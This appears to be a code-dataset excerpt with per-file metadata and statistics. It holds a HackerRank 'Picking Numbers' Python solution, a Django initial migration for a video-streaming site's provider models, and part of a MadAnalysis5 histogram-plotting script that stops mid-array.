35.671498
0.813637
0.039816
0
0.84375
0
0
0.100522
0
0
0
0
0
0.05625
1
0.078125
false
0
0.015625
0
0.096875
0
0
0
0
null
0
0
0
1
1
1
1
1
1
0
0
0
0
0
0
0
0
0
0
1
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
7
f93789fced1e4ec0e06ec30060a192c2fa18a980
629
py
Python
Algorithms/2. Implementation/17 - Picking Numbers.py
rosiejh/HackerRank
bfb07b8add04d3f3b67a61754db483f88a79e5a5
[ "Apache-2.0" ]
null
null
null
Algorithms/2. Implementation/17 - Picking Numbers.py
rosiejh/HackerRank
bfb07b8add04d3f3b67a61754db483f88a79e5a5
[ "Apache-2.0" ]
null
null
null
Algorithms/2. Implementation/17 - Picking Numbers.py
rosiejh/HackerRank
bfb07b8add04d3f3b67a61754db483f88a79e5a5
[ "Apache-2.0" ]
null
null
null
from collections import Counter


def pickingNumbers(a):
    # Count each value once; sorting first keeps the keys in ascending order.
    counts = Counter(sorted(a))
    keys, values = list(counts.keys()), list(counts.values())
    maxvalue = max(values)
    # Any two adjacent keys that differ by exactly 1 can be picked together.
    for i in range(len(keys) - 1):
        if keys[i + 1] - keys[i] == 1:
            if maxvalue < values[i] + values[i + 1]:
                maxvalue = values[i] + values[i + 1]
    return maxvalue


# OR, the same idea as a single expression:

def pickingNumbers(a):
    counts = Counter(sorted(a))
    keys, values = list(counts.keys()), list(counts.values())
    return max([values[i] + values[i + 1]
                for i in range(len(keys) - 1)
                if keys[i + 1] - keys[i] == 1] + [max(values)])
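# Quick sanity check against HackerRank's sample input: picking the two 4s
# and three 5s gives the longest valid selection, of length 5.
if __name__ == '__main__':
    print(pickingNumbers([1, 1, 2, 2, 4, 4, 5, 5, 5]))  # -> 5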
31.45
115
0.610493
94
629
4.085106
0.234043
0.036458
0.177083
0.1875
0.861979
0.822917
0.703125
0.703125
0.703125
0.703125
0
0.018219
0.214626
629
19
116
33.105263
0.759109
0.00318
0
0.461538
0
0
0
0
0
0
0
0
0
1
0.153846
false
0
0.153846
0
0.461538
0
0
0
0
null
0
0
1
1
1
1
1
1
1
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
7
f973c9aa75921b14e7d89b8c86b0976a42edf731
13,374
py
Python
strangeflix/provider/migrations/0001_initial.py
samsoldeinstein/webster2020
9795635e806caa261bb33d629f3d1f2bd603638c
[ "MIT" ]
6
2020-11-02T16:40:56.000Z
2020-11-07T06:59:00.000Z
strangeflix/provider/migrations/0001_initial.py
samsoldeinstein/webster2020
9795635e806caa261bb33d629f3d1f2bd603638c
[ "MIT" ]
null
null
null
strangeflix/provider/migrations/0001_initial.py
samsoldeinstein/webster2020
9795635e806caa261bb33d629f3d1f2bd603638c
[ "MIT" ]
2
2020-11-03T05:20:25.000Z
2020-11-03T05:38:47.000Z
# Generated by Django 3.1.2 on 2020-10-08 19:21

from django.conf import settings
from django.db import migrations, models
import django.db.models.deletion
import provider.models


class Migration(migrations.Migration):

    initial = True

    dependencies = [
        migrations.swappable_dependency(settings.AUTH_USER_MODEL),
    ]

    operations = [
        migrations.CreateModel(
            name='MovieDetails',
            fields=[
                ('movie_id', models.AutoField(primary_key=True, serialize=False)),
                ('movie_name', models.CharField(max_length=100)),
                ('description', models.TextField()),
                ('language', models.PositiveSmallIntegerField(choices=[(1, 'english'), (2, 'hindi'), (3, 'bengali'), (4, 'kannada'), (5, 'malayalam'), (6, 'marathi'), (7, 'tamil'), (8, 'telugu')])),
                ('date_of_creation', models.DateTimeField()),
                ('thumbnail_image', models.ImageField(upload_to=provider.models.movie_thumbnail_directory_path)),
                ('provider_id', models.ForeignKey(on_delete=django.db.models.deletion.PROTECT, to=settings.AUTH_USER_MODEL)),
            ],
            options={
                'verbose_name_plural': 'Movie Details',
            },
        ),
        migrations.CreateModel(
            name='SeriesDetails',
            fields=[
                ('series_id', models.AutoField(primary_key=True, serialize=False)),
                ('series_name', models.CharField(max_length=100)),
                ('description', models.TextField()),
                ('language', models.PositiveSmallIntegerField(choices=[(1, 'english'), (2, 'hindi'), (3, 'bengali'), (4, 'kannada'), (5, 'malayalam'), (6, 'marathi'), (7, 'tamil'), (8, 'telugu')])),
                ('category', models.PositiveSmallIntegerField(choices=[(1, 'sports'), (2, 'entertainment')])),
                ('date_of_creation', models.DateTimeField()),
                ('thumbnail_image', models.ImageField(upload_to=provider.models.series_thumbnail_directory_path)),
                ('provider_id', models.ForeignKey(on_delete=django.db.models.deletion.PROTECT, to=settings.AUTH_USER_MODEL)),
            ],
            options={
                'verbose_name_plural': 'Series Details',
            },
        ),
        migrations.CreateModel(
            name='SeriesSeasonDetails',
            fields=[
                ('series_season_id', models.AutoField(primary_key=True, serialize=False)),
                ('season_no', models.PositiveSmallIntegerField()),
                ('description', models.TextField()),
                ('date_of_creation', models.DateTimeField()),
                ('thumbnail_image', models.ImageField(upload_to=provider.models.series_season_thumbnail_directory_path)),
                ('verification_status', models.PositiveSmallIntegerField(choices=[(1, 'pending'), (2, 'verified'), (3, 'rejected'), (4, 'not submitted')])),
                ('series_id', models.ForeignKey(on_delete=django.db.models.deletion.PROTECT, to='provider.seriesdetails')),
            ],
            options={
                'verbose_name_plural': 'Series Season Details',
            },
        ),
        migrations.CreateModel(
            name='Videos',
            fields=[
                ('video_id', models.AutoField(primary_key=True, serialize=False)),
                ('video_type', models.PositiveSmallIntegerField(choices=[(1, 'free'), (2, 'series'), (3, 'movie')])),
            ],
            options={
                'verbose_name_plural': 'Videos',
            },
        ),
        migrations.CreateModel(
            name='SeriesVideosTags',
            fields=[
                ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
                ('episode_no', models.PositiveSmallIntegerField()),
                ('tag_word', models.CharField(max_length=50)),
                ('video_id', models.ForeignKey(on_delete=django.db.models.deletion.PROTECT, to='provider.videos')),
            ],
            options={
                'verbose_name_plural': 'Series Videos Tags',
            },
        ),
        migrations.CreateModel(
            name='SeriesVideos',
            fields=[
                ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
                ('video_name', models.CharField(max_length=100)),
                ('firebase_save_name', models.CharField(max_length=50)),
                ('firebase_token', models.CharField(max_length=50)),
                ('description', models.TextField()),
                ('thumbnail_image', models.ImageField(upload_to=provider.models.video_thumbnail_directory_path)),
                ('date_of_upload', models.DateTimeField()),
                ('date_of_release', models.DateTimeField()),
                ('episode_no', models.PositiveSmallIntegerField()),
                ('duration_of_video', models.IntegerField()),
                ('quality_of_video', models.PositiveSmallIntegerField(choices=[(1, '144'), (2, '240'), (3, '360'), (4, '480'), (5, '720'), (6, '1080')])),
                ('verification_status', models.PositiveSmallIntegerField(choices=[(1, 'pending'), (2, 'verified'), (3, 'rejected'), (4, 'not submitted')])),
                ('cost_of_video', models.PositiveSmallIntegerField()),
                ('series_season_id', models.ForeignKey(on_delete=django.db.models.deletion.PROTECT, to='provider.seriesseasondetails')),
                ('video_id', models.ForeignKey(on_delete=django.db.models.deletion.PROTECT, to='provider.videos')),
            ],
            options={
                'verbose_name_plural': 'Series Videos',
            },
        ),
        migrations.CreateModel(
            name='SeriesSubCategories',
            fields=[
                ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
                ('sub_category', models.PositiveSmallIntegerField(choices=[(1, 'cricket'), (2, 'football'), (3, 'tennis'), (4, 'martial arts'), (5, 'esports'), (6, 'hockey'), (7, 'badminton'), (8, 'wrestling'), (9, 'kabaddi'), (10, 'table tennis'), (11, 'action'), (12, 'adventure'), (13, 'animation'), (14, 'comedy'), (15, 'crime'), (16, 'drama'), (17, 'horror'), (18, 'romance'), (19, 'thriller')])),
                ('series_id', models.ForeignKey(on_delete=django.db.models.deletion.PROTECT, to='provider.seriesdetails')),
            ],
            options={
                'verbose_name_plural': 'Series Sub Categories',
            },
        ),
        migrations.CreateModel(
            name='MovieVideoTags',
            fields=[
                ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
                ('tag_word', models.CharField(max_length=50)),
                ('video_id', models.ForeignKey(on_delete=django.db.models.deletion.PROTECT, to='provider.videos')),
            ],
            options={
                'verbose_name_plural': 'Movie Video Tags',
            },
        ),
        migrations.CreateModel(
            name='MovieVideo',
            fields=[
                ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
                ('video_name', models.CharField(max_length=100)),
                ('description', models.TextField()),
                ('firebase_save_name', models.CharField(max_length=50)),
                ('firebase_token', models.CharField(max_length=50)),
                ('thumbnail_image', models.ImageField(upload_to=provider.models.video_thumbnail_directory_path)),
                ('date_of_upload', models.DateTimeField()),
                ('date_of_release', models.DateTimeField()),
                ('duration_of_video', models.IntegerField()),
                ('quality_of_video', models.PositiveSmallIntegerField(choices=[(1, '144'), (2, '240'), (3, '360'), (4, '480'), (5, '720'), (6, '1080')])),
                ('verification_status', models.PositiveSmallIntegerField(choices=[(1, 'pending'), (2, 'verified'), (3, 'rejected'), (4, 'not submitted')])),
                ('cost_of_video', models.PositiveSmallIntegerField()),
                ('movie_id', models.ForeignKey(on_delete=django.db.models.deletion.PROTECT, to='provider.moviedetails')),
                ('video_id', models.ForeignKey(on_delete=django.db.models.deletion.PROTECT, to='provider.videos')),
            ],
            options={
                'verbose_name_plural': 'Movie Video',
            },
        ),
        migrations.CreateModel(
            name='MovieSubCategories',
            fields=[
                ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
                ('sub_category', models.PositiveSmallIntegerField(choices=[(1, 'cricket'), (2, 'football'), (3, 'tennis'), (4, 'martial arts'), (5, 'esports'), (6, 'hockey'), (7, 'badminton'), (8, 'wrestling'), (9, 'kabaddi'), (10, 'table tennis'), (11, 'action'), (12, 'adventure'), (13, 'animation'), (14, 'comedy'), (15, 'crime'), (16, 'drama'), (17, 'horror'), (18, 'romance'), (19, 'thriller')])),
                ('movie_id', models.ForeignKey(on_delete=django.db.models.deletion.PROTECT, to='provider.moviedetails')),
            ],
            options={
                'verbose_name_plural': 'Movie Sub Categories',
            },
        ),
        migrations.CreateModel(
            name='FreeSeriesVideosTags',
            fields=[
                ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
                ('tag_word', models.CharField(max_length=50)),
                ('video_id', models.ForeignKey(on_delete=django.db.models.deletion.PROTECT, to='provider.videos')),
            ],
            options={
                'verbose_name_plural': 'Free Series Videos Tags',
            },
        ),
        migrations.CreateModel(
            name='FreeSeriesVideos',
            fields=[
                ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
                ('video_name', models.CharField(max_length=100)),
                ('firebase_save_name', models.CharField(max_length=50)),
                ('firebase_token', models.CharField(max_length=50)),
                ('description', models.TextField()),
                ('thumbnail_image', models.ImageField(upload_to=provider.models.video_thumbnail_directory_path)),
                ('date_of_upload', models.DateTimeField()),
                ('date_of_release', models.DateTimeField()),
                ('duration_of_video', models.IntegerField()),
                ('quality_of_video', models.PositiveSmallIntegerField(choices=[(1, '144'), (2, '240'), (3, '360'), (4, '480'), (5, '720'), (6, '1080')])),
                ('verification_status', models.PositiveSmallIntegerField(choices=[(1, 'pending'), (2, 'verified'), (3, 'rejected'), (4, 'not submitted')])),
                ('series_season_id', models.ForeignKey(on_delete=django.db.models.deletion.PROTECT, to='provider.seriesseasondetails')),
                ('video_id', models.ForeignKey(on_delete=django.db.models.deletion.PROTECT, to='provider.videos')),
            ],
            options={
                'verbose_name_plural': 'Free Series Videos',
            },
        ),
        migrations.CreateModel(
            name='FreeMovieVideoTags',
            fields=[
                ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
                ('tag_word', models.CharField(max_length=50)),
                ('video_id', models.ForeignKey(on_delete=django.db.models.deletion.PROTECT, to='provider.videos')),
            ],
            options={
                'verbose_name_plural': 'Free Movie Video Tags',
            },
        ),
        migrations.CreateModel(
            name='FreeMovieVideo',
            fields=[
                ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
                ('video_name', models.CharField(max_length=100)),
                ('description', models.TextField()),
                ('firebase_save_name', models.CharField(max_length=50)),
                ('firebase_token', models.CharField(max_length=50)),
                ('thumbnail_image', models.ImageField(upload_to=provider.models.video_thumbnail_directory_path)),
                ('date_of_upload', models.DateTimeField()),
                ('date_of_release', models.DateTimeField()),
                ('duration_of_video', models.IntegerField()),
                ('quality_of_video', models.PositiveSmallIntegerField(choices=[(1, '144'), (2, '240'), (3, '360'), (4, '480'), (5, '720'), (6, '1080')])),
                ('verification_status', models.PositiveSmallIntegerField(choices=[(1, 'pending'), (2, 'verified'), (3, 'rejected'), (4, 'not submitted')])),
                ('movie_id', models.ForeignKey(on_delete=django.db.models.deletion.PROTECT, to='provider.moviedetails')),
                ('video_id', models.ForeignKey(on_delete=django.db.models.deletion.PROTECT, to='provider.videos')),
            ],
            options={
                'verbose_name_plural': 'Free Movie Video',
            },
        ),
    ]
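# --- Illustrative note (assumes a standard Django project; names mirror the
# migration above). Each PositiveSmallIntegerField with `choices` stores a
# small integer and maps it to a display label; for example, `language`:
#
#     LANGUAGE_CHOICES = [(1, 'english'), (2, 'hindi'), (3, 'bengali'),
#                         (4, 'kannada'), (5, 'malayalam'), (6, 'marathi'),
#                         (7, 'tamil'), (8, 'telugu')]
#     assert dict(LANGUAGE_CHOICES)[1] == 'english'
#
# Applying this initial migration uses the usual management command:
#
#     python manage.py migrate provider 0001_initial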
58.401747
402
0.574099
1,255
13,374
5.92749
0.130677
0.033338
0.033876
0.053233
0.865573
0.83694
0.821347
0.821347
0.79715
0.79715
0
0.025985
0.263347
13,374
228
403
58.657895
0.729091
0.003365
0
0.705882
1
0
0.211525
0.012231
0
0
0
0
0
1
0
false
0
0.0181
0
0.036199
0
0
0
0
null
0
0
0
1
1
1
1
1
1
0
0
0
0
0
0
0
0
0
0
1
1
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
8
f99097b6c0cc04da92076639d2c552c39556f140
49,704
py
Python
post_optimization_studies/mad_analyses/ma100MeV_L1pt8-2pt4TeV_deta2pt6/Output/Histos/MadAnalysis5job_0/selection_0.py
sheride/axion_pheno
7d3fc08f5ae5b17a3500eba19a2e43f87f076ce5
[ "MIT" ]
null
null
null
post_optimization_studies/mad_analyses/ma100MeV_L1pt8-2pt4TeV_deta2pt6/Output/Histos/MadAnalysis5job_0/selection_0.py
sheride/axion_pheno
7d3fc08f5ae5b17a3500eba19a2e43f87f076ce5
[ "MIT" ]
null
null
null
post_optimization_studies/mad_analyses/ma100MeV_L1pt8-2pt4TeV_deta2pt6/Output/Histos/MadAnalysis5job_0/selection_0.py
sheride/axion_pheno
7d3fc08f5ae5b17a3500eba19a2e43f87f076ce5
[ "MIT" ]
null
null
null
def selection_0(): # Library import import numpy import matplotlib import matplotlib.pyplot as plt import matplotlib.gridspec as gridspec # Library version matplotlib_version = matplotlib.__version__ numpy_version = numpy.__version__ # Histo binning xBinning = numpy.linspace(0.0,2000.0,201,endpoint=True) # Creating data sequence: middle of each bin xData = numpy.array([5.0,15.0,25.0,35.0,45.0,55.0,65.0,75.0,85.0,95.0,105.0,115.0,125.0,135.0,145.0,155.0,165.0,175.0,185.0,195.0,205.0,215.0,225.0,235.0,245.0,255.0,265.0,275.0,285.0,295.0,305.0,315.0,325.0,335.0,345.0,355.0,365.0,375.0,385.0,395.0,405.0,415.0,425.0,435.0,445.0,455.0,465.0,475.0,485.0,495.0,505.0,515.0,525.0,535.0,545.0,555.0,565.0,575.0,585.0,595.0,605.0,615.0,625.0,635.0,645.0,655.0,665.0,675.0,685.0,695.0,705.0,715.0,725.0,735.0,745.0,755.0,765.0,775.0,785.0,795.0,805.0,815.0,825.0,835.0,845.0,855.0,865.0,875.0,885.0,895.0,905.0,915.0,925.0,935.0,945.0,955.0,965.0,975.0,985.0,995.0,1005.0,1015.0,1025.0,1035.0,1045.0,1055.0,1065.0,1075.0,1085.0,1095.0,1105.0,1115.0,1125.0,1135.0,1145.0,1155.0,1165.0,1175.0,1185.0,1195.0,1205.0,1215.0,1225.0,1235.0,1245.0,1255.0,1265.0,1275.0,1285.0,1295.0,1305.0,1315.0,1325.0,1335.0,1345.0,1355.0,1365.0,1375.0,1385.0,1395.0,1405.0,1415.0,1425.0,1435.0,1445.0,1455.0,1465.0,1475.0,1485.0,1495.0,1505.0,1515.0,1525.0,1535.0,1545.0,1555.0,1565.0,1575.0,1585.0,1595.0,1605.0,1615.0,1625.0,1635.0,1645.0,1655.0,1665.0,1675.0,1685.0,1695.0,1705.0,1715.0,1725.0,1735.0,1745.0,1755.0,1765.0,1775.0,1785.0,1795.0,1805.0,1815.0,1825.0,1835.0,1845.0,1855.0,1865.0,1875.0,1885.0,1895.0,1905.0,1915.0,1925.0,1935.0,1945.0,1955.0,1965.0,1975.0,1985.0,1995.0]) # Creating weights for histo: y1_PT_0 y1_PT_0_weights = numpy.array([0.0,0.0,0.291889811312,0.603239140711,0.714687929757,0.774834723846,0.930509508545,1.11271949064,1.01719190003,1.21709188038,1.23124427899,1.23124427899,1.29669827255,1.34800026751,1.35153826716,1.34269306803,1.3745358649,1.44706585778,1.37984266438,1.37099746525,1.3674594656,1.31969587029,1.41345426108,1.33738586856,1.35507626682,1.39222586317,1.39045706334,1.16402108559,1.21001588107,1.22593707951,1.2524726769,1.22416827968,1.22770627934,1.14986908699,1.12510268942,1.09856709203,1.00127070159,1.01011550072,1.00480870124,0.912819110284,0.884514713066,0.872131514283,0.850903116369,0.840288717413,0.801370321238,0.780141923324,0.707611530453,0.762451525063,0.728839928366,0.693459531844,0.7040735308,0.622698338798,0.597931941232,0.610315140015,0.573165543667,0.576703543319,0.569627544014,0.505942350274,0.521863548709,0.428105157924,0.5077115501,0.410414759663,0.421028758619,0.424567158272,0.366189044009,0.413952759315,0.339653606617,0.325501368008,0.34319164627,0.399800600706,0.355574845052,0.344960686096,0.359112924705,0.284813692007,0.364420004183,0.272430493224,0.251202135311,0.212283499136,0.24235701618,0.235280896876,0.21935961844,0.238818936528,0.208745459484,0.235280896876,0.214052538962,0.237049896702,0.171595823135,0.18751710157,0.18751710157,0.175133902787,0.16451970383,0.162750704004,0.166288743656,0.129139147308,0.162750704004,0.129139147308,0.127370107481,0.122063028003,0.148598465395,0.127370107481,0.0955275906111,0.102603709916,0.125601067655,0.123832027829,0.0972965904372,0.104372709742,0.111448829046,0.0742992326975,0.0866824314805,0.0972965904372,0.0919895109588,0.0778372723498,0.0689921532191,0.0778372723498,0.0778372723498,0.0566089144362,0.0601469940885,0.0566089144362,0.067223113393,0.0477637953056,0.0513018349578,0.0513018349578,0.067223113393,0.0495328351317,0.05307087478
39,0.0513018349578,0.040687676001,0.0513018349578,0.0548399146101,0.0371496123488,0.040687676001,0.0336115526965,0.0283044652181,0.0513018349578,0.0300734970442,0.0318425248704,0.0336115526965,0.0123832027829,0.0353805845226,0.0247664095658,0.0371496123488,0.0371496123488,0.0194593220874,0.0247664095658,0.0283044652181,0.0283044652181,0.0159212624352,0.0336115526965,0.026535437392,0.0141522346091,0.0141522346091,0.0229973777397,0.0106141749568,0.0141522346091,0.0229973777397,0.0194593220874,0.0123832027829,0.0159212624352,0.0106141749568,0.0123832027829,0.0159212624352,0.00707611530453,0.0141522346091,0.0123832027829,0.0106141749568,0.0123832027829,0.0141522346091,0.0106141749568,0.00707611530453,0.0123832027829,0.00530708747839,0.0176902902613,0.0123832027829,0.00884514713066,0.00884514713066,0.0106141749568,0.00884514713066,0.00530708747839,0.00884514713066,0.00176902902613,0.0106141749568,0.00707611530453,0.00530708747839,0.00884514713066,0.00530708747839,0.00530708747839,0.00353805845226,0.00176902902613,0.00530708747839,0.00353805845226,0.00353805845226,0.00530708747839,0.00707611530453,0.00353805845226,0.00353805845226,0.00176902902613,0.00707611530453,0.00884514713066,0.00353805845226,0.00353805845226]) # Creating weights for histo: y1_PT_1 y1_PT_1_weights = numpy.array([0.0,0.0,0.182720118359,0.371879215911,0.503306166146,0.563096430287,0.590913421521,0.647556198579,0.730882871522,0.744792566182,0.799309440536,0.824958962253,0.855874279819,0.846316310792,0.886898710271,0.87941908192,0.866631691225,0.952092660171,0.936064656744,0.875190458004,0.910485878547,0.872993811782,0.919008674045,0.901847575269,0.892230053787,0.883758417444,0.798256681047,0.841958190265,0.790739482692,0.795000880441,0.741563544196,0.696721345691,0.742671059968,0.686003902375,0.672150163041,0.621917468246,0.676373191423,0.594121260419,0.597356277619,0.556752295371,0.543923337863,0.530022436183,0.508668684773,0.462717371772,0.519326575635,0.517196276442,0.472282535056,0.425284058099,0.455193778523,0.406070198224,0.426363596209,0.433869203818,0.355822035779,0.377232621814,0.366519215274,0.350522227085,0.330185783468,0.313086555295,0.314180042268,0.26822009616,0.287456777815,0.267126529251,0.27888474163,0.256449853387,0.230786982328,0.262889711878,0.234002535067,0.222274138884,0.236151779136,0.189141791369,0.21479415082,0.177401444727,0.207285985254,0.175248763403,0.164555420845,0.15924641949,0.14533276799,0.151717070836,0.154950409375,0.145333207639,0.138925003875,0.138921286842,0.116459060426,0.118608344462,0.133575195101,0.123950359459,0.0993890888946,0.0983038353485,0.110053174811,0.104726267752,0.107918159383,0.0747900085174,0.0758752620635,0.0865491001939,0.0780021639694,0.087623722228,0.075865270041,0.0801492097928,0.084411127127,0.0844291127674,0.0577099250596,0.0566361823234,0.0726531145889,0.0577091656659,0.0619729215322,0.0534225880202,0.0662602585717,0.0427301247599,0.0427420752188,0.0448752121468,0.0459455575953,0.0427502686772,0.0395497359457,0.0288500344643,0.0427423949635,0.0416762061963,0.0352679904421,0.0374008116222,0.0352676587069,0.0256454329813,0.03205583499,0.0299271784849,0.0352645971512,0.0245777094395,0.0309896422261,0.0320562666454,0.0406073795352,0.0235092225071,0.0277816474522,0.0309911730039,0.0213667530301,0.0224374382074,0.0245800076046,0.0138982797733,0.0235137149205,0.0128249646957,0.0203008920013,0.0213753062014,0.0203083460501,0.0181654449177,0.0170947597404,0.0160281353211,0.0170988204984,0.0202967313232,0.017104080299,0.0192335001947,0.0106839260763,0.0138937833632,0.016029997
8341,0.0128257280862,0.0160258371559,0.0053397168315,0.0128220030602,0.0064137952996,0.00962069494781,0.00747812555057,0.00427122590237,0.00320689804948,0.0149649041926,0.00962628648359,0.00961883243482,0.00213917490736,0.00534234673182,0.00534530836728,0.00640930288629,0.0128220030602,0.00641116539928,0.00748151884141,0.00961280524685,0.00854771160537,0.0085447499699,0.00534048022202,0.00320689804948,0.00427462319001,0.00640667298598,0.00320426894853,0.00320426894853,0.00427275668021,0.00106958725384,0.00534420924481,0.00320503433745,0.00534157934449,0.0064137952996,0.00427385580268,0.00320503433745,0.00534004856664,0.00427199328969,0.004276485703,0.00213654540672,0.00427462319001,0.0,0.0010677235418,0.00320689804948,0.00320503433745,0.00106958725384,0.00106958725384,0.00106958725384,0.00534420924481,0.0032087621612,0.00213544708361]) # Creating weights for histo: y1_PT_2 y1_PT_2_weights = numpy.array([0.0,0.0,0.107641666146,0.263895704101,0.334036401138,0.402093697669,0.404177298175,0.463206512514,0.50209612196,0.517374525671,0.527096928033,0.600015345745,0.561820136467,0.618071350131,0.580570541022,0.628488552661,0.626404952155,0.600710145914,0.604182146757,0.619460550468,0.636822154685,0.628488552661,0.58682054254,0.556958935286,0.542375331744,0.582654141528,0.537513730563,0.565986937479,0.536819330394,0.537513730563,0.51251332449,0.490984919261,0.47570691555,0.460428511839,0.425705303405,0.434733305598,0.405566098513,0.388204494296,0.373620770753,0.362509368054,0.374315250922,0.35417584603,0.347231204343,0.333341960969,0.331953040632,0.315980396752,0.304174553885,0.319452717596,0.288201910005,0.281951748487,0.267368024944,0.252784301402,0.243756299209,0.217366732799,0.235422737185,0.218061212967,0.21667225263,0.201394088919,0.186810405377,0.19583840757,0.196532847738,0.170143281328,0.172921122003,0.157642958292,0.160420798967,0.138198033569,0.142364794581,0.124308790195,0.136809113231,0.139586953906,0.132642312219,0.138892473737,0.124308790195,0.107641666146,0.118058628677,0.107641666146,0.0972247436161,0.102085984797,0.11111398699,0.09514134311,0.0805576195676,0.0854188607484,0.0895856617605,0.0736130178807,0.0756964183868,0.059723774507,0.0777797788929,0.0673628563626,0.059723774507,0.0590292943383,0.0527791328201,0.0562514536636,0.0625016151818,0.0506957723141,0.0625016151818,0.059723774507,0.0513902124828,0.046528971302,0.0513902124828,0.0347231204343,0.046528971302,0.0451400509646,0.0395843576151,0.0402788097838,0.0312508075909,0.0395843576151,0.0340286562656,0.0388898934464,0.0319452717596,0.0361120447717,0.0333341960969,0.0256951102414,0.0215283332293,0.0291674190848,0.0291674190848,0.0291674190848,0.0250006460727,0.024306185904,0.024306185904,0.0180560243858,0.0208338730606,0.0187504845545,0.0256951102414,0.0236117217353,0.022222797398,0.0159726358798,0.0166670960485,0.00833355002423,0.0125003230364,0.00972247436161,0.0173615602172,0.0152781717111,0.0145837115424,0.0208338730606,0.013194787205,0.00763908585555,0.0104169345303,0.00763908585555,0.0118058628677,0.0125003230364,0.0152781717111,0.00972247436161,0.00902801019292,0.00763908585555,0.00347231204343,0.011111398699,0.0104169345303,0.00555569734949,0.00902801019292,0.00833355002423,0.00833355002423,0.00833355002423,0.00694462568686,0.00555569734949,0.00277784947474,0.0125003230364,0.0048612371808,0.00555569734949,0.00555569734949,0.00555569734949,0.00208338730606,0.00625016151818,0.00347231204343,0.00555569734949,0.00208338730606,0.00277784947474,0.00416677301212,0.00277784947474,0.00138892473737,0.00833355002423,0.0027778
4947474,0.0048612371808,0.00347231204343,0.00208338730606,0.00277784947474,0.00416677301212,0.00138892473737,0.00347231204343,0.00277784947474,0.000694462568686,0.00277784947474,0.00208338730606,0.00416677301212,0.00208338730606,0.00138892473737,0.00347231204343,0.00277784947474,0.00138892473737,0.0,0.00208338730606,0.00208338730606,0.00208338730606,0.0,0.00138892473737,0.0,0.00208338730606,0.0,0.00138892473737,0.0,0.00138892473737]) # Creating weights for histo: y1_PT_3 y1_PT_3_weights = numpy.array([0.0,0.0,0.0829772228614,0.187765611732,0.235655344926,0.27595855603,0.286864119035,0.347081895626,0.332383051576,0.3575132985,0.386910946599,0.399713150127,0.400187310257,0.429584918357,0.449973723974,0.444283722406,0.444758122537,0.429584918357,0.434800519794,0.412989713785,0.426740117573,0.407299712217,0.414886114307,0.415834514568,0.408248112478,0.398290709735,0.39497158882,0.37221214255,0.373634622942,0.360832419414,0.360832419414,0.314365166612,0.34281449445,0.323374129094,0.306304524391,0.309623605306,0.294450641125,0.26078559185,0.285915838774,0.264104672765,0.261259711981,0.233758704404,0.241345186494,0.240871026363,0.221904821138,0.225698062183,0.210525098003,0.204835216435,0.183498210556,0.181127449903,0.181601610034,0.170696007029,0.165954445723,0.14177251906,0.147936560759,0.153152242196,0.132763556578,0.142246679191,0.132763556578,0.130866956056,0.117590592398,0.11948719292,0.117590592398,0.115219791745,0.100046827564,0.102417588217,0.102891748348,0.0910378650822,0.0768132211631,0.0806064622082,0.0820289026001,0.095305266258,0.0862963037759,0.0753907407712,0.0734941002487,0.0697008592036,0.0635368575053,0.0630626973747,0.0663817782891,0.0711233395955,0.0630626973747,0.057372815807,0.0497863337168,0.0464672528024,0.0526312545007,0.0488380134556,0.0493121735862,0.0426740117573,0.0474155730637,0.0450447724105,0.0445706122798,0.0369841341897,0.0341392014058,0.0350875136671,0.0374582903203,0.0360358259284,0.0303459563607,0.0327167370139,0.0293976480995,0.0303459563607,0.026078559185,0.0256044030544,0.0251302469237,0.0289234919688,0.0275010235769,0.0265527113156,0.020862845748,0.0199145334867,0.0175437568336,0.0213370018786,0.0184920690948,0.0189662252255,0.0137505117885,0.020862845748,0.0123280433966,0.0146988240497,0.0142246679191,0.0161212884416,0.0165954445723,0.0146988240497,0.0161212884416,0.0184920690948,0.0128021995272,0.0109055790046,0.0118538912659,0.00758649009019,0.00995726674337,0.00806064622082,0.00900895448209,0.00711233395955,0.0142246679191,0.0113797351353,0.00995726674337,0.00806064622082,0.0118538912659,0.00711233395955,0.00758649009019,0.0118538912659,0.005215713437,0.00663817782891,0.00711233395955,0.00758649009019,0.00900895448209,0.00426740117573,0.00806064622082,0.00616402169828,0.00568986556764,0.00568986556764,0.00379324464509,0.00568986556764,0.00758649009019,0.00426740117573,0.00568986556764,0.005215713437,0.00426740117573,0.005215713437,0.00474155730637,0.005215713437,0.00237077785318,0.00616402169828,0.00474155730637,0.00426740117573,0.00474155730637,0.00284493358382,0.00189662252255,0.00379324464509,0.00284493358382,0.00142246679191,0.00237077785318,0.00142246679191,0.00189662252255,0.00142246679191,0.00142246679191,0.000948311061273,0.00284493358382,0.00237077785318,0.00237077785318,0.00237077785318,0.000948311061273,0.00189662252255,0.00142246679191,0.000948311061273,0.00142246679191,0.00189662252255,0.00142246679191,0.000948311061273,0.00189662252255,0.000474155730637,0.00237077785318,0.000948311061273,0.00237077785318,0.0,0.000948311061273,0.0009483110
